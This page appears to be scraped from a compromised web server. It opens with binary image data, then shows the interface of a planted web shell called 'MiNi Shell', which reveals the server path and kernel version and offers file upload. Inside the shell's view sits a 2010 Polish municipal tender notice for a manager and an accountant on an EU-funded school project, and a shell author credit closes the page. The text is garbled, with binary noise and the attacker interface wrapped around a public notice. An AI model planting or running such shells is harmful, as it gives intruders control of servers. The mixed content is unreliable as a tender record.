JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100318/59897-N-2010.html

<p class="kh_header"><b>Węgierska Górka: Świadczenie usług kierownika oraz księgowego projektu Lepsze gimnazja w gminie Węgierska Górka</b><br>
<b>Numer ogłoszenia: 59897 - 2010; data zamieszczenia: 18.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Węgierskiej Górce , ul. Zielona 43, 34-350 Węgierska Górka, woj. śląskie, tel. 033 8641501, faks 033 8641780.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług kierownika oraz księgowego projektu Lepsze gimnazja w gminie Węgierska Górka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług kierownika oraz księgowego projektu Lepsze gimnazja w gminie Węgierska Górka. Projekt realizowany w ramach Działania 9.1 Programu Operacyjnego Kapitał Ludzki, Podziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.
Zadanie nr 1: Kierownik projektu Lepsze Gimnazja 
Do zakresu obowiązków  należy w szczególności:
1.Nadzór nad realizacją całości przedsięwzięcia i reprezentowanie go na zewnątrz zgodnie z wnioskiem i umową zawartą z Instytucją Pośredniczącą Instytucją Wdrażającą.
2.Nadzór nad zgodnością prowadzonych działań z zapisami zawartymi we wniosku, w tym budżetem i harmonogramem 
3.Nadzorowanie bieżących postępów w realizacji projektu.
4.Koordynacja prac zespołu projektowego. 
5.Dokonywanie podziału obowiązków pomiędzy członków zespołu projektowego, w tym delegowanie odpowiedzialności. 
3.Nadzorowanie pracy wszystkich osób zaangażowanych w realizację projektu.
4.Utrzymywanie stałych kontaktów z opiekunem projektu w Instytucji Pośredniczącej, informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu, terminowe przesyłanie wszystkich wymaganych dokumentów i informacji, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur, standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów.   
5.Rzetelne i terminowe sporządzanie wniosków o płatność wraz z zebraniem wszystkich załączników, w tym sporządzanie ostatniego wniosku o płatność.
6.Przygotowanie i realizację zamówień publicznych zgodnie z ustawą Prawo Zamówień Publicznych w zakresie działań projektowych. 
7.Przygotowywanie i koordynacja korespondencji związanej z projektem do Instytucji Pośredniczącej.
8.Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne 
w zakresie realizacji projektu.
9.Obecność podczas kontroli projektu.
10.Kontrola wydatkowania środków.
11.Dokonywanie innych czynności zastrzeżonych do kompetencji kierownika projektu, zleconych przez Zleceniodawcę, nie wymienionych wyżej i związanych z realizacją projektu.
12.	Zleceniobiorca ponosi pełną odpowiedzialność za realizację czynności określonych w §2 pkt.1 niniejszej umowy.

Zadanie nr 2: Księgowy projektu Lepsze Gimnazja 
Do zakresu obowiązków Zleceniobiorcy należy prowadzenie strony finansowej przedsięwzięcia, a w szczególności:
1.Wspieranie działań Kierownika  projektu w aspekcie księgowym, w odniesieniu do poszczególnych zadań objętych projektem.
2.Rzetelne i terminowe prowadzenie dokumentacji księgowej  zdarzeń gospodarczych wynikających z realizacji projektu.
3.Kontrola poprawności formalnej i rachunkowej księgowych i finansowych dokumentów projektu.
4.Dokonywanie  klasyfikacji dokumentów  z uwagi na: wydatki kwalifikowane, zadania w ramach budżetu projektu, pozycje budżetowe, koszty personelu, wydatki w ramach  cross-financingu jak również ze względu na klasyfikację budżetową z uwzględnieniem źródeł finansowania. Dekretacja dokumentów.
5.Odpowiednie opisywanie dokumentów związanych z realizacją projektu, zgodnie 
z wytycznymi.
6.Współpraca ze Skarbnikiem Gminy w zakresie planu finansowego realizowanego projektu - kontrola zgodności wydatków z planem finansowym jednostki realizującej projekt oraz przygotowywanie propozycji ewentualnych zmian planu finansowego. 
7.Kontrola zgodności realizacji  wydatków w ramach projektu z budżetem projektu.
8.Dokonywanie płatności finansowych związanych z projektem; 
9.Współpraca w zakresie księgowości z Instytucją Pośredniczącą i Zarządzającą.
10.Rozliczanie projektu pod względem finansowym, sporządzanie wniosków  o płatności.
11.Sporządzanie sprawozdań finansowych oraz  sprawozdań budżetowych w zakresie wydatków projektu, zaangażowania wydatków, zobowiązań, wydatków strukturalnych oraz dochodów.
12.Przygotowanie we współpracy z kierownikiem projektu harmonogramu płatności wg zasad określonych w dokumentach programowych. 
13.Prowadzenie dokumentacji osobowej personelu projektu.
14.Odpowiedzialność za całość obsługi finansowej projektu.
15.Wykonywanie innych zadań zleconych przez Zleceniodawcę, nie wymienionych wyżej i związanych z realizacją projektu określonego w §1 niniejszej umowy.
16.Zleceniobiorca ponosi pełną odpowiedzialność za realizację czynności określonych w §2 pkt.1 niniejszej umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.21.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie  nr  1: kierownik projektu Lepsze gimnazja
Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że :                            -w ciągu ostatnich trzech lat przed upływem terminu do składania ofert, a jeżeli okres działalności jest krótszy, w tym okresie, wykonał lub wykonuje przynajmniej 1 usługę potwierdzoną referencjami  w zakresie   projektu współfinansowanego ze środków  Unii Europejskiej 
-posiada minimum 10 letni staż pracy w oświacie w tym co najmniej 5 lat na stanowisku dyrektora szkoły

Zadanie  nr  2: księgowy projektu Lepsze gimnazja
Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że:                             -w ciągu ostatnich trzech lat przed upływem terminu do składania ofert, a jeżeli okres działalności jest krótszy, w tym okresie, wykonał lub wykonuje przynajmniej 1 usługę potwierdzoną referencjami w zakresie  księgowego projektu współfinansowanego ze środków  Unii Europejskiej 
-posiada minimum 5 letni staż na stanowisku księgowego w jednostce budżetowej</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że :
-mają ukończone studia wyższe (dotyczy zadania nr 1 i nr 2) 
-mają doświadczenie w realizacji projektów współfinansowanych  ze  środków Unii Europejskiej  ( dotyczy zadania nr 1 i nr 2)
-mają ukończony kurs w zakresie kierowania, dokumentowania i rozliczania wydatków z funduszy europejskich ( dotyczy zadania nr 2)
-przedstawią zaświadczenie lub certyfikat dotyczący procedur prowadzenia rozliczenia i monitorowania projektów z funduszy europejskich (dotyczy zadania nr 1)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art.144 ust.1 ustawy Pzp- zastrzega sobie prawo do zmiany  treści istotnych postanowień umowy:
1)na wskutek powstałych zmian wynikłych z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy
2)w zakresie terminów realizacji z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy
3)jeżeli niezbędna jest zmian sposobu wykonania zobowiązania, o ile zmiana taka jest korzystna dla Zamawiającego oraz konieczna w celu prawidłowego wykonania umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wegierska-gorka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy, ul.Zielona 43, 34-350 Węgierska Górka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2010 godzina 11:00, miejsce: Urząd Gminy, ul. Zielona 43, 34-350 Węgierska Górka, 
pok. nr 17 I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany w ramach Działania 9.1 Programu Operacyjnego Kapitał Ludzki, Podziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kierownik projektu Lepsze gimnazja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zakresu obowiązków  należy w szczególności:
1.Nadzór nad realizacją całości przedsięwzięcia i reprezentowanie go na zewnątrz zgodnie z wnioskiem i umową zawartą z Instytucją Pośredniczącą/ Instytucją Wdrażającą.
2.Nadzór nad zgodnością prowadzonych działań z zapisami zawartymi we wniosku, w tym budżetem i harmonogramem 
3.Nadzorowanie bieżących postępów w realizacji projektu.
4.Koordynacja prac zespołu projektowego. 
5.Dokonywanie podziału obowiązków pomiędzy członków zespołu projektowego, w tym delegowanie odpowiedzialności. 
3.Nadzorowanie pracy wszystkich osób zaangażowanych w realizację projektu.
4.Utrzymywanie stałych kontaktów z opiekunem projektu w Instytucji Pośredniczącej, informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu, terminowe przesyłanie wszystkich wymaganych dokumentów i informacji, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur, standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów.   
5.Rzetelne i terminowe sporządzanie wniosków o płatność wraz z zebraniem wszystkich załączników, w tym sporządzanie ostatniego wniosku o płatność.
6.Przygotowanie i realizację zamówień publicznych zgodnie z ustawą Prawo Zamówień Publicznych w zakresie działań projektowych. 
7.Przygotowywanie i koordynacja korespondencji związanej z projektem do Instytucji Pośredniczącej.
8.Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne 
w zakresie realizacji projektu.
9.Obecność podczas kontroli projektu.
10.Kontrola wydatkowania środków.
11.Dokonywanie innych czynności zastrzeżonych do kompetencji kierownika projektu, zleconych przez Zleceniodawcę, nie wymienionych wyżej i związanych z realizacją projektu.
12.	Zleceniobiorca ponosi pełną odpowiedzialność za realizację czynności określonych w §2 pkt.1 niniejszej umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Księgowy projektu Lepsze Gimnazja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zakresu obowiązków Zleceniobiorcy należy prowadzenie strony finansowej przedsięwzięcia, a w szczególności:
1.Wspieranie działań Kierownika  projektu w aspekcie księgowym, w odniesieniu do poszczególnych zadań objętych projektem.
2.Rzetelne i terminowe prowadzenie dokumentacji księgowej  zdarzeń gospodarczych wynikających z realizacji projektu.
3.Kontrola poprawności formalnej i rachunkowej księgowych i finansowych dokumentów projektu.
4.Dokonywanie  klasyfikacji dokumentów  z uwagi na: wydatki kwalifikowane, zadania w ramach budżetu projektu, pozycje budżetowe, koszty personelu, wydatki w ramach  cross-financingu jak również ze względu na klasyfikację budżetową z uwzględnieniem źródeł finansowania. Dekretacja dokumentów.
5.Odpowiednie opisywanie dokumentów związanych z realizacją projektu, zgodnie 
z wytycznymi.
6.Współpraca ze Skarbnikiem Gminy w zakresie planu finansowego realizowanego projektu - kontrola zgodności wydatków z planem finansowym jednostki realizującej projekt oraz przygotowywanie propozycji ewentualnych zmian planu finansowego. 
7.Kontrola zgodności realizacji  wydatków w ramach projektu z budżetem projektu.
8.Dokonywanie płatności finansowych związanych z projektem; 
9.Współpraca w zakresie księgowości z Instytucją Pośredniczącą i Zarządzającą.
10.Rozliczanie projektu pod względem finansowym, sporządzanie wniosków  o płatności.
11.Sporządzanie sprawozdań finansowych oraz  sprawozdań budżetowych w zakresie wydatków projektu, zaangażowania wydatków, zobowiązań, wydatków strukturalnych oraz dochodów.
12.Przygotowanie we współpracy z kierownikiem projektu harmonogramu płatności wg zasad określonych w dokumentach programowych. 
13.Prowadzenie dokumentacji osobowej personelu projektu.
14.Odpowiedzialność za całość obsługi finansowej projektu.
15.Wykonywanie innych zadań zleconych przez Zleceniodawcę, nie wymienionych wyżej i związanych z realizacją projektu określonego w §1 niniejszej umowy.
16.Zleceniobiorca ponosi pełną odpowiedzialność za realizację czynności określonych w §2 pkt.1 niniejszej umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com